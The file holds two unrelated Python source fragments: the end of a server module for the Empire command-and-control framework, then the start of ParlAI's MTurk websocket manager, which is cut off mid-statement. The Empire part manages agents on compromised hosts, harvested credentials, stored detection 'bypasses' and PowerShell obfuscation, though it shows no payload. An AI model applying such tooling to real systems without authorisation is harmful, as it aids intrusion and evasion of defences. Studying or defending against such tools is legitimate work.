return make_response(jsonify({'error': f'Credential {uid} not found'}), 404)
@app.route('/api/reporting', methods=['GET'])
def get_reporting():
"""
Returns JSON describing the reporting events from the backend database.
"""
# Add filters for agent, event_type, and MAYBE a like filter on msg
reporting_raw = main.run_report_query()
reporting_events = []
for reporting_event in reporting_raw:
reporting_events.append(
{"timestamp": reporting_event.timestamp, "event_type": reporting_event.event_type,
"username": reporting_event.username, "agent_name": reporting_event.agent_name,
"host_name": reporting_event.hostname, "taskID": reporting_event.taskID, "task": reporting_event.task,
"results": reporting_event.results})
return jsonify({'reporting': reporting_events})
@app.route('/api/reporting/generate', methods=['GET'])
def generate_report():
"""
Generates reports on the backend database.
"""
report_directory = main.generate_report()
return jsonify({'report': report_directory})
@app.route('/api/reporting/agent/<string:reporting_agent>', methods=['GET'])
def get_reporting_agent(reporting_agent):
"""
Returns JSON describing the reporting events from the backend database for
the agent specified by reporting_agent.
"""
# first resolve the supplied name to a sessionID
session_id = Session().query(models.Agent.session_id).filter(models.Agent.name == reporting_agent).scalar()
if not session_id:
return jsonify({'reporting': ''})
# lots of confusion around name/session_id in these queries.
reporting_raw = Session().query(models.Reporting).filter(models.Reporting.name.contains(session_id)).all()
reporting_events = []
for reporting_event in reporting_raw:
reporting_events.append(
{"ID": reporting_event.id, "agentname": reporting_event.name, "event_type": reporting_event.event_type,
"message": json.loads(reporting_event.message), "timestamp": reporting_event.timestamp,
"taskID": reporting_event.taskID})
return jsonify({'reporting': reporting_events})
@app.route('/api/reporting/type/<string:event_type>', methods=['GET'])
def get_reporting_type(event_type):
"""
Returns JSON describing the reporting events from the backend database for
the event type specified by event_type.
"""
reporting_raw = Session().query(models.Reporting).filter(models.Reporting.event_type == event_type).all()
reporting_events = []
for reporting_event in reporting_raw:
reporting_events.append(
{"ID": reporting_event.id, "agentname": reporting_event.name, "event_type": reporting_event.event_type,
"message": json.loads(reporting_event.message), "timestamp": reporting_event.timestamp,
"taskID": reporting_event.taskID})
return jsonify({'reporting': reporting_events})
@app.route('/api/reporting/msg/<string:msg>', methods=['GET'])
def get_reporting_msg(msg):
"""
Returns JSON describing the reporting events from the backend database for
the any messages with *msg* specified by msg.
"""
reporting_raw = Session().query(models.Reporting).filter(models.Reporting.message.contains(msg)).all()
reporting_events = []
for reporting_event in reporting_raw:
reporting_events.append(
{"ID": reporting_event.id, "agentname": reporting_event.name, "event_type": reporting_event.event_type,
"message": json.loads(reporting_event.message), "timestamp": reporting_event.timestamp,
"taskID": reporting_event.taskID})
return jsonify({'reporting': reporting_events})
@app.route('/api/malleable-profiles', methods=['GET'])
def get_malleable_profiles():
"""
Returns JSON with all currently registered profiles.
"""
active_profiles_raw = Session().query(models.Profile).all()
profiles = []
for active_profile in active_profiles_raw:
profiles.append(
{'name': active_profile.name, 'category': active_profile.category,
'data': active_profile.data, 'file_path': active_profile.file_path,
'created_at': active_profile.created_at,
'updated_at': active_profile.updated_at})
return jsonify({"profiles": profiles})
@app.route('/api/malleable-profiles/<string:profile_name>', methods=['GET'])
def get_malleable_profile(profile_name):
"""
Returns JSON with the requested profile
"""
profile = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
if profile:
return {'name': profile.name, 'category': profile.category,
'data': profile.data, 'file_path': profile.file_path,
'created_at': profile.created_at, 'updated_at': profile.updated_at}
return make_response(jsonify({'error': f'malleable profile {profile_name} not found'}), 404)
@app.route('/api/malleable-profiles', methods=['POST'])
def add_malleable_profile():
"""
Add malleable profile to database
"""
if not request.json or 'name' not in request.json or 'category' not in request.json or 'data' not in request.json:
abort(400)
profile_name = request.json['name']
profile_category = request.json['category']
profile_data = request.json['data']
profile = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
if not profile:
profile = models.Profile(name=profile_name,
file_path='',
category=profile_category,
data=profile_data,
)
Session().add(profile)
Session().commit()
return {'name': profile.name, 'category': profile.category,
'data': profile.data, 'file_path': profile.file_path,
'created_at': profile.created_at, 'updated_at': profile.updated_at}
return make_response(jsonify({'error': f'malleable profile {profile_name} already exists'}), 400)
@app.route('/api/malleable-profiles/<string:profile_name>', methods=['DELETE'])
def remove_malleable_profiles(profile_name):
"""
Delete malleable profiles from database.
Note: If a .profile file exists on the server, the profile will repopulate in the database when Empire restarts.
"""
profile = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
if profile:
Session().delete(profile)
Session().commit()
return jsonify({"success": True})
return make_response(jsonify({'error': f'malleable profile {profile_name} not found'}), 404)
@app.route('/api/malleable-profiles/<string:profile_name>', methods=['PUT'])
def edit_malleable_profiles(profile_name):
"""
Edit malleable profiles in database
"""
if not request.json or 'data' not in request.json:
abort(400)
profile_data = request.json['data']
profile = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
if profile:
profile.data = profile_data
Session().commit()
return {'name': profile.name, 'category': profile.category,
'data': profile.data, 'file_path': profile.file_path,
'created_at': profile.created_at, 'updated_at': profile.updated_at}
return make_response(jsonify({'error': f'malleable profile {profile_name} not found'}), 404)
@app.route('/api/malleable-profiles/export', methods=['POST'])
def export_malleable_profiles():
"""
Export malleable profiles from database to files
"""
# TODO: add option to export profiles from the database to files
return jsonify({"success": True})
@app.route('/api/bypasses', methods=['GET'])
def get_bypasses():
"""
Returns JSON with all the bypasses.
"""
bypasses_raw = Session().query(models.Bypass).all()
bypasses = []
for bypass in bypasses_raw:
bypasses.append({'id': bypass.id, 'name': bypass.name, 'code': bypass.code,
'created_at': bypass.created_at, 'updated_at': bypass.updated_at})
return {"bypasses": bypasses}
@app.route('/api/bypasses/<int:uid>', methods=['GET'])
def get_bypass(uid: int):
"""
Returns JSON with a single bypass
"""
bypass = Session().query(models.Bypass).filter(models.Bypass.id == uid).first()
if not bypass:
return make_response(jsonify({'error': f'bypass {uid} not found'}), 404)
return {'id': bypass.id, 'name': bypass.name, 'code': bypass.code,
'created_at': bypass.created_at, 'updated_at': bypass.updated_at}
@app.route('/api/bypasses', methods=['POST'])
def create_bypass():
"""
Create a bypass
"""
if not request.json or 'name' not in request.json or 'code' not in request.json:
abort(400)
name = request.json['name'].lower()
bypass = Session().query(models.Bypass).filter(models.Bypass.name == name).first()
if not bypass:
bypass = models.Bypass(name=name, code=request.json['code'])
Session().add(bypass)
Session().commit()
return {'id': bypass.id, 'name': bypass.name, 'code': bypass.code,
'created_at': bypass.created_at, 'updated_at': bypass.updated_at}
return make_response(jsonify({'error': f'bypass {name} already exists'}), 400)
@app.route('/api/bypasses/<int:uid>', methods=['PUT'])
def edit_bypass(uid: int):
"""
Edit a bypass
"""
if not request.json or 'code' not in request.json:
abort(400)
bypass = Session().query(models.Bypass).filter(models.Bypass.id == uid).first()
if not bypass:
return make_response(jsonify({'error': f'bypass {uid} not found'}), 404)
bypass.code = request.json['code']
Session().commit()
return {'id': bypass.id, 'name': bypass.name, 'code': bypass.code,
'created_at': bypass.created_at, 'updated_at': bypass.updated_at}
@app.route('/api/bypasses/<int:uid>', methods=['DELETE'])
def delete_bypass(uid: int):
"""
Delete a bypass
"""
bypass = Session().query(models.Bypass).filter(models.Bypass.id == uid).first()
if not bypass:
return make_response(jsonify({'error': f'bypass {uid} not found'}), 404)
Session().delete(bypass)
Session().commit()
return jsonify({"success": True})
@app.route('/api/admin/login', methods=['POST'])
def server_login():
"""
Takes a supplied username and password and returns the current API token
if authentication is accepted.
"""
if not request.json or not 'username' in request.json or not 'password' in request.json:
abort(400)
supplied_username = request.json['username']
supplied_password = request.json['password']
# try to prevent some basic bruting
time.sleep(2)
token = main.users.user_login(supplied_username, supplied_password)
if token:
return jsonify({'token': token})
else:
return make_response('', 401)
@app.route('/api/admin/logout', methods=['POST'])
def server_logout():
"""
Logs out current user
"""
main.users.user_logout(g.user['id'])
return jsonify({'success': True})
@app.route('/api/admin/restart', methods=['GET', 'POST', 'PUT'])
def signal_server_restart():
"""
Signal a restart for the Flask server and any Empire instance.
"""
restart_server()
return jsonify({'success': True})
@app.route('/api/admin/shutdown', methods=['GET', 'POST', 'PUT'])
def signal_server_shutdown():
"""
Signal a restart for the Flask server and any Empire instance.
"""
shutdown_server()
return jsonify({'success': True})
@app.route('/api/admin/options', methods=['POST'])
def set_admin_options():
"""
Obfuscate all future powershell commands run on all agents.
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
# Set global obfuscation
if 'obfuscate' in request.json:
if request.json['obfuscate'].lower() == 'true':
main.obfuscate = True
else:
main.obfuscate = False
# if obfuscate command is given then set, otherwise use default
if 'obfuscate_command' in request.json:
main.obfuscateCommand = request.json['obfuscate_command']
# add keywords to the obfuscation database
if 'keyword_obfuscation' in request.json:
keyword = request.json['keyword_obfuscation']
try:
# if no replacement given then generate a random word
if not request.json['keyword_replacement']:
keyword_replacement = random.choice(string.ascii_uppercase) + ''.join(
random.choice(string.ascii_uppercase + string.digits) for _ in range(4))
else:
keyword_replacement = request.json['keyword_replacement']
Session().add(models.Function(keyword=keyword, replacement=keyword_replacement))
Session().commit()
except Exception:
print(helpers.color("couldn't connect to Database"))
return jsonify({'success': True})
@app.route('/api/users', methods=['GET'])
def get_users():
"""
Returns JSON of the users from the backend database.
"""
users_raw = Session().query(models.User).all()
user_report = []
for reporting_users in users_raw:
data = {"ID": reporting_users.id, "username": reporting_users.username,
"last_logon_time": reporting_users.last_logon_time, "enabled": reporting_users.enabled,
"admin": reporting_users.admin}
user_report.append(data)
return jsonify({'users': user_report})
@app.route('/api/users/<int:uid>', methods=['GET'])
def get_user(uid):
"""
return the user for an id
"""
user = Session().query(models.User).filter(models.User.id == uid).first()
if user is None:
return make_response(jsonify({'error': 'user %s not found' % uid}), 404)
return jsonify(
{"ID": user.id, "username": user.username, "last_logon_time": user.last_logon_time, "enabled": user.enabled,
"admin": user.admin, "notes": user.notes})
@app.route('/api/users/me', methods=['GET'])
def get_user_me():
"""
Returns the current user.
"""
return jsonify(g.user)
@app.route('/api/users', methods=['POST'])
def create_user():
# Check that input is a valid request
if not request.json or not 'username' in request.json or not 'password' in request.json:
abort(400)
# Check if user is an admin
if not main.users.is_admin(g.user['id']):
abort(403)
status = main.users.add_new_user(request.json['username'], request.json['password'])
return jsonify({'success': status})
@app.route('/api/users/<int:uid>/disable', methods=['PUT'])
def disable_user(uid):
# Don't disable yourself
if not request.json or not 'disable' in request.json or uid == g.user['id']:
abort(400)
# User performing the action should be an admin.
# User being updated should not be an admin.
if not main.users.is_admin(g.user['id']) or main.users.is_admin(uid):
abort(403)
status = main.users.disable_user(uid, request.json['disable'])
return jsonify({'success': status})
@app.route('/api/users/<int:uid>/updatepassword', methods=['PUT'])
def update_user_password(uid):
if not request.json or not 'password' in request.json:
abort(400)
# Must be an admin or updating self.
if not (main.users.is_admin(g.user['id']) or uid == g.user['id']):
abort(403)
status = main.users.update_password(uid, request.json['password'])
return jsonify({'success': status})
@app.route('/api/users/<int:uid>/notes', methods=['POST'])
def update_user_notes(uid):
"""
Update notes for a user.
{"notes" : "notes here"}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if 'notes' not in request.json:
return make_response(jsonify({'error': 'JSON body must include key "notes"'}), 400)
user = Session().query(models.User).filter(models.User.id == uid).first()
user.notes = request.json['notes']
Session().commit()
return jsonify({'success': True})
@app.route('/api/plugins/active', methods=['GET'])
def list_active_plugins():
"""
Lists all active plugins
"""
plugins = []
plugin_path = empireMenu.installPath + "/plugins"
all_plugin_names = [name for _, name, _ in pkgutil.walk_packages([plugin_path])]
# check if the plugin has already been loaded
active_plugins = list(empireMenu.loadedPlugins.keys())
for plugin_name in all_plugin_names:
if plugin_name in active_plugins:
data = empireMenu.loadedPlugins[plugin_name].info[0]
data['options'] = empireMenu.loadedPlugins[plugin_name].options
plugins.append(data)
return jsonify({'plugins': plugins})
@app.route('/api/plugins/<string:plugin_name>', methods=['GET'])
def get_plugin(plugin_name):
# check if the plugin has already been loaded
if plugin_name not in empireMenu.loadedPlugins.keys():
try:
empireMenu.do_plugin(plugin_name)
except:
return make_response(jsonify({'error': 'plugin %s not found' % plugin_name}), 400)
# get the commands available to the user. This can probably be done in one step if desired
name = empireMenu.loadedPlugins[plugin_name].get_commands()['name']
commands = empireMenu.loadedPlugins[plugin_name].get_commands()['commands']
description = empireMenu.loadedPlugins[plugin_name].get_commands()['description']
data = {'name': name, 'commands': commands, 'description': description}
return jsonify(data)
@app.route('/api/plugins/<string:plugin_name>', methods=['POST'])
def execute_plugin(plugin_name):
# check if the plugin has been loaded
if plugin_name not in empireMenu.loadedPlugins.keys():
return make_response(jsonify({'error': 'plugin %s not loaded' % plugin_name}), 404)
use_plugin = empireMenu.loadedPlugins[plugin_name]
# set all passed module options
for key, value in request.json.items():
if key not in use_plugin.options:
return make_response(jsonify({'error': 'invalid module option'}), 400)
use_plugin.options[key]['Value'] = value
for option, values in use_plugin.options.items():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
return make_response(jsonify({'error': 'required module option missing'}), 400)
if values['Strict'] and values['Value'] not in values['SuggestedValues']:
return make_response(jsonify({'error': f'{option} must be set to one of suggested values.'}), 400)
results = use_plugin.execute(request.json)
if results is False:
return make_response(jsonify({'error': 'internal plugin error'}), 400)
return jsonify({} if results is None else results)
def shutdown_server():
"""
Shut down the Flask server and any Empire instance gracefully.
"""
global serverExitCommand
print(helpers.color("[*] Shutting down Empire RESTful API"))
if suppress:
print(helpers.color("[*] Shutting down the Empire instance"))
main.shutdown()
serverExitCommand = 'shutdown'
func = request.environ.get('werkzeug.server.shutdown')
if func is not None:
func()
def restart_server():
"""
Restart the Flask server and any Empire instance.
"""
global serverExitCommand
shutdown_server()
serverExitCommand = 'restart'
def signal_handler(signal, frame):
"""
Overrides the keyboardinterrupt signal handler so we can gracefully shut everything down.
"""
global serverExitCommand
with app.test_request_context():
shutdown_server()
serverExitCommand = 'shutdown'
# repair the original signal handler
import signal
signal.signal(signal.SIGINT, signal.default_int_handler)
sys.exit()
try:
signal.signal(signal.SIGINT, signal_handler)
except ValueError:
pass
# wrap the Flask connection in SSL and start it
cert_path = os.path.abspath("./empire/server/data/")
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % cert_path, "%s/empire-priv.key" % cert_path)
app.run(host=ip, port=int(port), ssl_context=context, threaded=True)
def start_sockets(empire_menu: MainMenu, ip='0.0.0.0', port: int = 5000, suppress: bool = False):
app = Flask(__name__)
app.json_encoder = MyJsonEncoder
socketio = SocketIO(app, cors_allowed_origins="*", json=flask.json, async_mode="threading")
empire_menu.socketio = socketio
room = 'general' # A socketio user is in the general channel if the join the chat.
chat_participants = {}
chat_log = [] # This is really just meant to provide some context to a user that joins the convo.
# In the future we can expand to store chat messages in the db if people want to retain a whole chat log.
if suppress:
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
def get_user_from_token():
user = empire_menu.users.get_user_from_token(request.args.get('token', ''))
if user:
user['password'] = ''
user['api_token'] = ''
return user
@socketio.on('connect')
def connect():
user = get_user_from_token()
if user:
print(helpers.color(f"[+] {user['username']} connected to socketio"))
return
return False
@socketio.on('disconnect')
def test_disconnect():
user = get_user_from_token()
print(helpers.color(f"[+] {'Client' if user is None else user['username']} disconnected from socketio"))
@socketio.on('chat/join')
def on_join(data=None):
"""
The calling user gets added to the "general" chat room.
Note: while 'data' is unused, it is good to leave it as a parameter for compatibility reasons.
The server fails if a client sends data when none is expected.
:return: emits a join event with the user's details.
"""
user = get_user_from_token()
if user['username'] not in chat_participants:
chat_participants[user['username']] = user
join_room(room)
socketio.emit("chat/join", {'user': user,
'username': user['username'],
'message': f"{user['username']} has entered the room."}, room=room)
@socketio.on('chat/leave')
def on_leave(data=None):
"""
The calling user gets removed from the "general" chat room.
:return: emits a leave event with the user's details.
"""
user = get_user_from_token()
if user is not None:
chat_participants.pop(user['username'], None)
leave_room(room)
socketio.emit("chat/leave", {'user': user,
'username': user['username'],
'message': user['username'] + ' has left the room.'}, to=room)
@socketio.on('chat/message')
def on_message(data):
"""
The calling user sends a message.
:param data: contains the user's message.
:return: Emits a message event containing the message and the user's username
"""
user = get_user_from_token()
chat_log.append({'username': user['username'], 'message': data['message']})
socketio.emit("chat/message", {'username': user['username'], 'message': data['message']}, to=room)
@socketio.on('chat/history')
def on_history(data=None):
"""
The calling user gets sent the last 20 messages.
:return: Emit chat messages to the calling user.
"""
sid = request.sid
for x in range(len(chat_log[-20:])):
username = chat_log[x]['username']
message = chat_log[x]['message']
socketio.emit("chat/message", {'username': username, 'message': message, 'history': True}, to=sid)
@socketio.on('chat/participants')
def on_participants(data=None):
"""
The calling user gets sent a list of "general" chat participants.
:return: emit participant event containing list of users.
"""
sid = request.sid
socketio.emit("chat/participants", list(chat_participants.values()), to=sid)
print(helpers.color("[*] Starting Empire SocketIO on %s:%s" % (ip, port)))
cert_path = os.path.abspath("./empire/server/data/")
proto = ssl.PROTOCOL_TLS
context = ssl.SSLContext(proto)
context.load_cert_chain("{}/empire-chain.pem".format(cert_path), "{}/empire-priv.key".format(cert_path))
socketio.run(app, host=ip, port=port, ssl_context=context)
def run(args):
def thread_websocket(empire_menu, suppress=False):
try:
start_sockets(empire_menu=empire_menu, suppress=suppress, ip=args.restip, port=int(args.socketport))
except SystemExit as e:
pass
def thread_api(empire_menu):
try:
start_restful_api(empireMenu=empire_menu, suppress=True, username=args.username, password=args.password,
ip=args.restip, port=args.restport)
except SystemExit as e:
pass
def server_startup_validator():
print(helpers.color('[*] Testing APIs'))
username = 'test-' + ''.join(random.choice(string.ascii_lowercase) for i in range(4))
password = ''.join(random.choice(string.ascii_lowercase) for i in range(10))
main.users.add_new_user(username, password)
response = requests.post(url=f'https://{args.restip}:{args.restport}/api/admin/login',
json={'username': username, 'password': password},
verify=False)
if response:
print(helpers.color('[+] Empire RESTful API successfully started'))
try:
sio = socketio.Client(ssl_verify=False)
sio.connect(f'wss://{args.restip}:{args.socketport}?token={response.json()["token"]}')
print(helpers.color('[+] Empire SocketIO successfully started'))
except Exception as e:
print(e)
print(helpers.color('[!] Empire SocketIO failed to start'))
sys.exit()
finally:
cleanup_test_user(username)
sio.disconnect()
else:
print(helpers.color('[!] Empire RESTful API failed to start'))
cleanup_test_user(password)
sys.exit()
def cleanup_test_user(username: str):
print(helpers.color('[*] Cleaning up test user'))
user = Session().query(models.User).filter(models.User.username == username).first()
Session().delete(user)
Session().commit()
if not args.restport:
args.restport = '1337'
else:
args.restport = args.restport[0]
if not args.restip:
args.restip = '0.0.0.0'
else:
args.restip = args.restip[0]
if not args.socketport:
args.socketport = '5000'
else:
args.socketport = args.socketport[0]
if args.version:
print(empire.VERSION)
elif args.reset:
# Reset called from database/base.py
sys.exit()
else:
if not os.path.exists('./empire/server/data/empire-chain.pem'):
print(helpers.color("[*] Certificate not found. Generating..."))
subprocess.call("./setup/cert.sh")
time.sleep(3)
# start an Empire instance and RESTful API with the teamserver interface
main = empire.MainMenu(args=args)
thread = helpers.KThread(target=thread_api, args=(main,))
thread.daemon = True
thread.start()
sleep(2)
thread2 = helpers.KThread(target=thread_websocket, args=(main, False))
thread2.daemon = True
thread2.start()
sleep(2)
server_startup_validator()
main.teamserver()
sys.exit()
|
socket_manager.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import errno
import logging
import json
import threading
import time
from queue import PriorityQueue, Empty
import websocket
from parlai.mturk.core.dev.shared_utils import print_and_log
import parlai.mturk.core.dev.data_model as data_model
import parlai.mturk.core.dev.shared_utils as shared_utils
class Packet:
"""Class for holding information sent over a socket"""
# Possible Packet Status
STATUS_NONE = -1
STATUS_INIT = 0
STATUS_SENT = 1
STATUS_FAIL = 2
# TODO remove unused attributes
def __init__(
self,
id,
type,
sender_id,
receiver_id,
assignment_id,
data,
conversation_id=None,
requires_ack=None,
blocking=None,
ack_func=None,
):
"""
Create a packet to be used for holding information before it is
sent through the socket
id: Unique ID to distinguish this packet from others
type: TYPE of packet (ACK, ALIVE, MESSAGE)
sender_id: Sender ID for this packet
receiver_id: Recipient ID for this packet
assignment_id: Assignment ID for this packet
data: Contents of the packet
conversation_id: Packet metadata - what conversation this belongs to
requires_ack: No longer used.
blocking: No longer used.
ack_func: Function to call upon successful ack of a packet
Default calls no function on ack
"""
self.id = id
# Possible Packet Types are set by data_model
self.type = type
self.sender_id = sender_id
self.receiver_id = receiver_id
self.assignment_id = assignment_id
self.data = data
self.conversation_id = conversation_id
self.ack_func = ack_func
self.status = self.STATUS_INIT
@staticmethod
def from_dict(packet):
"""Create a packet from the dictionary that would
be recieved over a socket
"""
try:
packet_id = packet['id']
packet_type = packet['type']
sender_id = packet['sender_id']
receiver_id = packet.get('receiver_id', None)
assignment_id = packet.get('assignment_id', None)
data = packet.get('data', '')
conversation_id = packet.get('conversation_id', None)
return Packet(
packet_id,
packet_type,
sender_id,
receiver_id,
assignment_id,
data,
conversation_id,
)
except Exception as e:
print_and_log(
logging.WARN,
'Could not create a valid packet out of the dictionary'
'provided: {}, error: {}'.format(packet, repr(e)),
)
return None
def as_dict(self):
"""Convert a packet into a form that can be pushed over a socket"""
return {
'id': self.id,
'type': self.type,
'sender_id': self.sender_id,
'receiver_id': self.receiver_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'data': self.data,
}
def get_sender_connection_id(self):
"""Get the connection_id that this packet came from"""
return '{}_{}'.format(self.sender_id, self.assignment_id)
def get_receiver_connection_id(self):
"""Get the connection_id that this is going to"""
return '{}_{}'.format(self.receiver_id, self.assignment_id)
def new_copy(self):
"""Return a new packet that is a copy of this packet with
a new id and with a fresh status
"""
packet = Packet.from_dict(self.as_dict())
packet.id = shared_utils.generate_event_id(self.receiver_id)
return packet
def __repr__(self):
return 'Packet <{}>'.format(self.as_dict())
def swap_sender(self):
"""Swaps the sender_id and receiver_id"""
self.sender_id, self.receiver_id = self.receiver_id, self.sender_id
return self
def set_type(self, new_type):
"""Updates the message type"""
self.type = new_type
return self
def set_data(self, new_data):
"""Updates the message data"""
self.data = new_data
return self
class SocketManager:
"""SocketManager is a wrapper around websocket to conform to the API
allowing the remote state to sync up with our local state.
"""
# Default pings without pong before socket considered dead
DEF_MISSED_PONGS = 20
PING_RATE = 4
DEF_DEAD_TIME = 30
def __init__(
self,
server_url,
port,
alive_callback,
message_callback,
socket_dead_callback,
task_group_id,
socket_dead_timeout=None,
server_death_callback=None,
):
"""
server_url: url at which the server is to be run
port: port for the socket to operate on
alive_callback: function to be called on alive Packets, defined
alive_callback(self, pkt)
message_callback: function to be called on message Packets, defined
message_callback(self, pkt)
socket_dead_callback: function to be called when a socket dies, should
return false if the socket_manager should ignore
the death and treat the socket as alive defined
on_socket_dead(self, worker_id, assignment_id)
socket_dead_timeout: time to wait between pings before dying
"""
self.server_url = server_url
self.port = port
self.alive_callback = alive_callback
self.message_callback = message_callback
self.socket_dead_callback = socket_dead_callback
self.server_death_callback = server_death_callback
if socket_dead_timeout is not None:
self.missed_pongs = 1 + socket_dead_timeout / self.PING_RATE
else:
self.missed_pongs = self.DEF_MISSED_PONGS
self.task_group_id = task_group_id
self.ws = None
self.keep_running = True
# initialize the state
self.listen_thread = None
self.send_thread = None
self.sending_queue = PriorityQueue()
self.open_channels = set()
self.last_sent_ping_time = 0 # time of last ping send
self.pings_without_pong = 0
self.processed_packets = set()
self.packet_map = {}
self.alive = False
self.is_shutdown = False
self.send_lock = threading.Condition()
self.packet_map_lock = threading.Condition()
self.worker_assign_ids = {} # mapping from connection id to pair
# setup the socket
self._setup_socket()
def get_my_sender_id(self):
"""Gives the name that this socket manager should use for its world"""
return '[World_{}]'.format(self.task_group_id)
def _safe_send(self, data, force=False):
if not self.alive and not force:
# Try to wait a half second to send a packet
timeout = 0.5
while timeout > 0 and not self.alive:
time.sleep(0.1)
timeout -= 0.1
if not self.alive:
# don't try to send a packet if we're still dead
return False
try:
with self.send_lock:
self.ws.send(data)
except websocket.WebSocketConnectionClosedException:
# The channel died mid-send, wait for it to come back up
return False
except BrokenPipeError: # noqa F821 we don't support p2
# The channel died mid-send, wait for it to come back up
return False
except AttributeError:
# _ensure_closed was called in parallel, self.ws = None
return False
except Exception as e:
shared_utils.print_and_log(
logging.WARN,
'Unexpected socket error occured: {}'.format(repr(e)),
should_print=True,
)
return False
return True
def _ensure_closed(self):
self.alive = False
if self.ws is None:
return
try:
self.ws.close()
except websocket.WebSocketConnectionClosedException:
pass
self.ws = None
def _send_world_alive(self):
"""Registers world with the passthrough server"""
self._safe_send(
json.dumps(
{
'type': data_model.AGENT_ALIVE,
'content': {
'id': 'WORLD_ALIVE',
'sender_id': self.get_my_sender_id(),
},
}
),
force=True,
)
def _try_send_world_ping(self):
if time.time() - self.last_sent_ping_time > self.PING_RATE:
self._safe_send(
json.dumps(
{
'type': data_model.WORLD_PING,
'content': {
'id': 'WORLD_PING',
'sender_id': self.get_my_sender_id(),
},
}
),
force=True,
)
self.last_sent_ping_time = time.time()
def _send_packet(self, packet, send_time):
"""Sends a packet, blocks if the packet is blocking"""
# Send the packet
pkt = packet.as_dict()
if pkt['data'] is None or packet.status == Packet.STATUS_SENT:
return # This packet was _just_ sent.
shared_utils.print_and_log(logging.DEBUG, 'Send packet: {}'.format(packet))
result = self._safe_send(json.dumps({'type': pkt['type'], 'content': pkt}))
if not result:
# The channel died mid-send, wait for it to come back up
self.sending_queue.put((send_time, packet))
return
packet.status = Packet.STATUS_SENT
if packet.ack_func is not None:
packet.ack_func(packet)
def _spawn_reaper_thread(self):
def _reaper_thread(*args):
start_time = time.time()
wait_time = self.DEF_MISSED_PONGS * self.PING_RATE
while time.time() - start_time < wait_time:
if self.is_shutdown:
return
if self.alive:
return
time.sleep(0.3)
if self.server_death_callback is not None:
shared_utils.print_and_log(
logging.WARN,
'Server has disconnected and could not reconnect. '
'Assuming the worst and calling the death callback. '
'(Usually shutdown)',
should_print=True,
)
self.server_death_callback()
reaper_thread = threading.Thread(
target=_reaper_thread, name='socket-reaper-{}'.format(self.task_group_id)
)
reaper_thread.daemon = True
reaper_thread.start()
def _setup_socket(self):
"""Create socket handlers and registers the socket"""
def on_socket_open(*args):
shared_utils.print_and_log(logging.DEBUG, 'Socket open: {}'.format(args))
self._send_world_alive()
def on_error(ws, error):
try:
if error.errno == errno.ECONNREFUSED:
self.use_socket = False
self._ensure_closed()
raise Exception("Socket refused connection, cancelling")
else:
shared_utils.print_and_log(
logging.WARN, 'Socket logged error: {}'.format(error)
)
self._ensure_closed()
except Exception:
if type(error) is websocket.WebSocketConnectionClosedException:
return # Connection closed is noop
shared_utils.print_and_log(
logging.WARN,
'Socket logged error: {} Restarting'.format(repr(error)),
)
self._ensure_closed()
def on_disconnect(*args):
"""Disconnect event is a no-op for us, as the server reconnects
automatically on a retry. Just in case the server is actually
dead we set up a thread to reap the whole task.
"""
shared_utils.print_and_log(
logging.INFO, 'World server disconnected: {}'.format(args)
)
self._ensure_closed()
if not self.is_shutdown:
self._spawn_reaper_thread()
def on_message(*args):
"""Incoming message handler for SERVER_PONG, MESSAGE_BATCH,
AGENT_DISCONNECT, SNS_MESSAGE, SUBMIT_MESSAGE, AGENT_ALIVE
"""
packet_dict = json.loads(args[1])
if packet_dict['type'] == 'conn_success': # TODO make socket func
self.alive = True
return
# The packet inherits the socket function type
packet_dict['content']['type'] = packet_dict['type']
packet = Packet.from_dict(packet_dict['content'])
if packet is None:
return
packet_id = packet.id
packet_type = packet.type
if packet_id in self.processed_packets:
return # no need to handle already-processed packets
# Note to self that this packet has already been processed,
# and shouldn't be processed again in the future
self.processed_packets.add(packet_id)
if packet_type == data_model.SERVER_PONG:
# Incoming pong means our ping was returned
self.pings_without_pong = 0
elif packet_type == data_model.AGENT_ALIVE:
# agent is connecting for the first time
self.alive_callback(packet)
self.processed_packets.add(packet_id)
elif packet_type == data_model.MESSAGE_BATCH:
# Any number of agents are included in this message batch,
# so process each individually
batched_packets = packet.data['messages']
for batched_packet_dict in batched_packets:
batched_packet_dict['type'] = data_model.AGENT_MESSAGE
batched_packet = Packet.from_dict(batched_packet_dict)
self.message_callback(batched_packet)
elif packet_type == data_model.AGENT_DISCONNECT:
# Server detected an agent disconnect, extract and remove
disconnected_id = packet.data['connection_id']
worker_id, assign_id = self.worker_assign_ids[disconnected_id]
self.socket_dead_callback(worker_id, assign_id)
elif packet_type == data_model.SNS_MESSAGE:
# Treated as a regular message
self.message_callback(packet)
elif packet_type == data_model.SUBMIT_MESSAGE:
# Treated as a regular message
self.message_callback(packet)
def run_socket(*args):
url_base_name = self.server_url.split('https://')[1]
protocol = "wss"
if url_base_name in ['localhost', '127.0.0.1']:
protocol = "ws"
while self.keep_running:
try:
sock_addr = "{}://{}:{}/".format(protocol, url_base_name, self.port)
self.ws = websocket.WebSocketApp(
sock_addr,
on_message=on_message,
on_error=on_error,
on_close=on_disconnect,
)
self.ws.on_open = on_socket_open
self.ws.run_forever(ping_interval=8 * self.PING_RATE)
self._ensure_closed()
except Exception as e:
shared_utils.print_and_log(
logging.WARN,
'Socket error {}, attempting restart'.format(repr(e)),
)
time.sleep(0.2)
# Start listening thread
self.listen_thread = threading.Thread(
target=run_socket, name='Main-Socket-Recv-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
time.sleep(1.2)
start_time = time.time()
while not self.alive:
if time.time() - start_time > self.DEF_DEAD_TIME:
self.server_death_callback()
raise ConnectionRefusedError( # noqa F821 we only support py3
